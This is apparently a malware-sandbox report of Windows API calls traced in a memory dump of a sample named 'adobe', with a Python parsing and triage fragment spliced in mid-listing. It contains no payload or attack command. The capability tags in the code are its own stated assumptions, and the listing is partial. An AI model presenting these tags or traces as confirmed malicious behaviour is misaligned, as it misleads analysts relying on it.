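• FindClose.KERNEL32(000000FF,00453886,0045387F,?,00000000,004538E9), ref: 00453879
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Find$CloseFileNext
APIs
• RtlEnterCriticalSection.KERNEL32(0049A420,00000000,004021FC), ref: 004020CB
  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82), ref: 004019E2
  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420), ref: 00401A1F
  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89), ref: 00401A7C
Memory Dump Source
APIs
• RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE), ref: 0042DE94
• RegCloseKey.ADVAPI32(?,0042DF05,?,00000000), ref: 0042DEF8
Memory Dump Source
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                 # call-site address inside the dump
    subcall: Optional[str]   # callee address when the call sits inside a subcall, else None


@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)

    @property
    def direct_calls(self) -> List[ApiCall]:
        return [c for c in self.calls if c.subcall is None]


def parse_listing(text: str) -> List[FunctionBlock]:
    """Split the listing at 'APIs' / 'Memory Dump Source' markers and parse the API lines between them."""
    blocks: List[FunctionBlock] = []
    current: Optional[FunctionBlock] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if stripped == "Memory Dump Source":
            current = None
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
    return blocks


# Assumed capability labels for triage; this mapping is the example's own, not the report's.
CAPABILITY_TAGS = {
    "FindFirstFileA": "filesystem-enumeration", "FindNextFileA": "filesystem-enumeration",
    "RegEnumKeyExA": "registry-enumeration", "RegQueryValueExA": "registry-read",
    "MoveFileA": "file-rename", "FindResourceA": "resource-access", "LocalAlloc": "heap-alloc",
}

# Enumeration APIs and the close call expected in the same function (assumed pairing).
HANDLE_PAIRS = {"FindNextFileA": "FindClose", "RegEnumKeyExA": "RegCloseKey"}


def capabilities(blocks: List[FunctionBlock]) -> Dict[str, List[str]]:
    """Map each capability tag to the call sites exhibiting it; only direct calls count."""
    out: Dict[str, List[str]] = {}
    for block in blocks:
        for call in block.direct_calls:
            tag = CAPABILITY_TAGS.get(call.name)
            if tag:
                out.setdefault(tag, []).append(call.ref)
    return out


def unbalanced_handles(block: FunctionBlock) -> List[str]:
    """Return enumeration APIs whose expected close call is missing from the same function."""
    names = {c.name for c in block.direct_calls}
    return [opener for opener, closer in HANDLE_PAIRS.items() if opener in names and closer not in names]


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for i, blk in enumerate(parsed):
        print(i, [c.name for c in blk.direct_calls], "unbalanced:", unbalanced_handles(blk))
    print(capabilities(parsed))
```

Subcall lines are kept but excluded from the capability tally, so a function that only reaches LocalAlloc through the shared subcall at 004019CC is not itself tagged as allocating; run the tally on the full report text to get one call-site list per tag.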
                                                                                                                                                          APIs
                                                                                                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00452332
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00452358), ref: 0045233A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastMove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 55378915-0
                                                                                                                                                          • Opcode ID: 97243ea131f7e615965f3b4c998cd639dcaee1aebf6cb28d0d97209af4e9fe74
                                                                                                                                                          • Instruction ID: 9dc6be0a43312f787551d7621e84e5f1cbe43add256c0caa6dae814d5531f3df
                                                                                                                                                          • Opcode Fuzzy Hash: 97243ea131f7e615965f3b4c998cd639dcaee1aebf6cb28d0d97209af4e9fe74
                                                                                                                                                          • Instruction Fuzzy Hash: 0101D671B04204AB8B00DB7A9D414AEB7ECDB89725750457BFC08E3242EA7C5E098559
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451E3F), ref: 00451E19
• GetLastError.KERNEL32(00000000,00000000,00000000,00451E3F), ref: 00451E21
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 9c633ffd2730be144555f8e166e3da3e4b6d19e01f2cb78139bc1df7f376b4ab
• Instruction ID: 5fcceeafc3bf0a8a0ab19b2a667eb9dbaa6c6a95428f386d4b5c3ef860233f0d
• Opcode Fuzzy Hash: 9c633ffd2730be144555f8e166e3da3e4b6d19e01f2cb78139bc1df7f376b4ab
• Instruction Fuzzy Hash: D6F02271A00208ABCB00EFB59C42AAEB3E8DB49311F5045B7FC04E3292E67D5E088698
Uniqueness
• Uniqueness Score: -1.00%
APIs
• DeleteFileA.KERNEL32(00000000,00000000,00451FD5,?,-00000001,?), ref: 00451FAF
• GetLastError.KERNEL32(00000000,00000000,00451FD5,?,-00000001,?), ref: 00451FB7
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID:
• API String ID: 2018770650-0
• Opcode ID: ea08452e2cf790cd4843b13ce774bb785cd5b8944d5698c9d7ced65edc9dc9fc
• Instruction ID: 3a6aef72c926bc74b3f5ffd68857e1a70631f8bc3b8d107904d8cc5ac4359f01
• Opcode Fuzzy Hash: ea08452e2cf790cd4843b13ce774bb785cd5b8944d5698c9d7ced65edc9dc9fc
• Instruction Fuzzy Hash: FEF0C872A04604AFCB00EFB5AC415AEB7E8DB48315B5145B7FC04E3662E7385E188598
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,004521AF,?,?,00000000), ref: 00452189
• GetLastError.KERNEL32(00000000,00000000,004521AF,?,?,00000000), ref: 00452191
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AttributesErrorFileLast
• String ID:
• API String ID: 1799206407-0
• Opcode ID: b1313862b735acf36ecf6f7e8dc159732f58253739bf9a5dab4a362ad4fff649
• Instruction ID: b815831808181ea2df36f5baafd21cc1f6e17761c2faf862e3375c8032269dda
• Opcode Fuzzy Hash: b1313862b735acf36ecf6f7e8dc159732f58253739bf9a5dab4a362ad4fff649
• Instruction Fuzzy Hash: D6F02870A04B08ABDB10DFA59D014AEB3B8EB4932575047B7FC14A3382D7785E084588
Uniqueness
• Uniqueness Score: -1.00%
APIs
• LoadCursorA.USER32(00000000,00007F00), ref: 00423259
• LoadCursorA.USER32(00000000,00000000), ref: 00423283
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CursorLoad
• String ID:
• API String ID: 3238433803-0
• Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
• Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
• Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
• Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D
Uniqueness
• Uniqueness Score: -1.00%
APIs
• SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
• LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 37d4004467aedf9023216c3f2fcd60aa1c38cfe2935b93077bdbbd30db4f209d
• Instruction ID: 1f7e49cd896e1bdba9cb1c47732ae581670473b421036b970d27c02fb23a5fd1
• Opcode Fuzzy Hash: 37d4004467aedf9023216c3f2fcd60aa1c38cfe2935b93077bdbbd30db4f209d
• Instruction Fuzzy Hash: ACF05E70614744BEDB029F679C6282ABAECE74DB1179248BAF800A7691E63D58108928
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetVersion.KERNEL32(00000428,0046D2F2), ref: 0046D266
• 756FE550.OLE32(00498B78,00000000,00000001,00498B88,?,00000428,0046D2F2), ref: 0046D282
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: E550Version
• String ID:
• API String ID: 1323609852-0
• Opcode ID: 2adb852dba3f4503b09edf3856c4535be32f6068aae6262c518fac7c77d88ac4
• Instruction ID: 958c817140785bfd31846451c6a0f61a4aae663e2f42346d0c9f081eae2f78dd
• Opcode Fuzzy Hash: 2adb852dba3f4503b09edf3856c4535be32f6068aae6262c518fac7c77d88ac4
• Instruction Fuzzy Hash: FEF08C70B50200DFEB20A72AEA46B4B37D0D761324F5841BBB044A62A4E7B99480CA9E
Uniqueness
• Uniqueness Score: -1.00%
                                                                                                                                                          APIs
                                                                                                                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
                                                                                                                                                          • GetClassInfoA.USER32(00000000,?,?), ref: 00416301
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClassInfo
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3534257612-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046F291,?,00000000), ref: 0044FF7E
• GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046F291,?,00000000), ref: 0044FF86
  • Part of subcall function 0044FD24: GetLastError.KERNEL32(0044FB40,0044FDE6,?,00000000,?,004964F4,00000001,00000000,00000002,00000000,00496655,?,?,00000005,00000000,00496689), ref: 0044FD27
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Global$Alloc
• String ID:
• API String ID: 2558781224-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
  • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
  • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: InfoScroll
• String ID:
• API String ID: 629608716-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
  • Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
• SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B66E,?,00000000,?,?,0046B87B,?,00000000,0046B8BA), ref: 0046B652
  • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
  • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
• String ID:
• API String ID: 390483697-0
                                                                                                                                                          • Opcode ID: e03eb3e96cbdf10a5bd49a6075d4ad9eb7061a3b2e17c795c48b5758940daeb5
                                                                                                                                                          • Instruction ID: 5a7ac4f6dd7026821f63f8db9839e9502a484e666ce84196906c6456f1bc72a3
                                                                                                                                                          • Opcode Fuzzy Hash: e03eb3e96cbdf10a5bd49a6075d4ad9eb7061a3b2e17c795c48b5758940daeb5
                                                                                                                                                          • Instruction Fuzzy Hash: A1F09A71208300FFE7159B62ED16B1AB7A8E309718F51447BF904C65A0E7B9588089AE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
• Instruction ID: 028ceee379c3c7d470caefb370f3d10d378470f307764de9520dc446ef7e13f5
• Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
• Instruction Fuzzy Hash: 1AF06D3090410AEFEB1CCF58D0A58BFB7A1EB48300B20856FE607C7790D638AE60DB58
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
• Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
• Opcode Fuzzy Hash: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
• Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
• Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
• Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
• Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,0042CCE0,?,00000001,?,?,00000000,?,0042CD32,00000000,00452095,00000000,004520B6,?,00000000), ref: 0042CCC3
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: d299bff6ffe95d85c0e1fd2d6a18476be6bf9d726564c92005f9b92eb77878ac
• Instruction ID: 1943a86784c022a2dfd859aef87f3de3c0de5fcd5c78e915f44ffa8231ae9d07
• Opcode Fuzzy Hash: d299bff6ffe95d85c0e1fd2d6a18476be6bf9d726564c92005f9b92eb77878ac
• Instruction Fuzzy Hash: B0E06571304704BFD711EB629C93A5EBBACD745714B914476F500D7541D578AE009558
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE74
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 88ba7f38ac6a174f1adf2cbdf404144dab2fd00d4d43951c8a3f55ea8643f5f2
• Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
• Opcode Fuzzy Hash: 88ba7f38ac6a174f1adf2cbdf404144dab2fd00d4d43951c8a3f55ea8643f5f2
• Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528E3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
